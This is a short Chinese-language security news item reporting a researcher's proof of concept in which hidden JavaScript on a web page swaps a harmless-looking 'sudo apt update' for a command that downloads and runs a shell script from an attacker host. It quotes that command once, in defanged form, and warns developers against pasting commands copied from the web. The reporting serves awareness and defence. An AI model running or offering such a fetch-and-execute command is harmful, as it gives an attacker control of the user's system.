從網路上複製/貼上命令列要小心遭駭

一名安全研究人員Gabriel Friedlander近日警告，隨手從網路上複製與貼上（Copy/Paste）命令列時要特別小心，因為駭客可能趁此駭進開發者的系統或應用程式。

Friedlander打造了一個概念性驗證攻擊手法，他設計一個假裝可用來更新Ubuntu作業系統的命令列，該命令列顯示的文字很簡單，為「sudo apt update」，但當開發者複製它，並將它貼上記事本或終端時，它出現的卻是「curl http[:]//attacker-domain:8000/shell.sh | sh 」，若是直接貼入終端，它將立即執行。

這是因為Friedlander在此一HTML頁面上藏匿了JavaScript程式碼，而讓開發者眼見的文字與貼上之後所呈現的內容完全不同。

Friedlander說，不管是新手或是熟練的開發者，都可能會從網路上複製命令列或部份程式碼，但這是非常危險的行為，也許會讓駭客直接於程式中植入後門，相關的攻擊非常地簡單，卻可能帶來極大的傷害，建議開發者應永遠避免於終端貼上直接自網路上複製的命令列。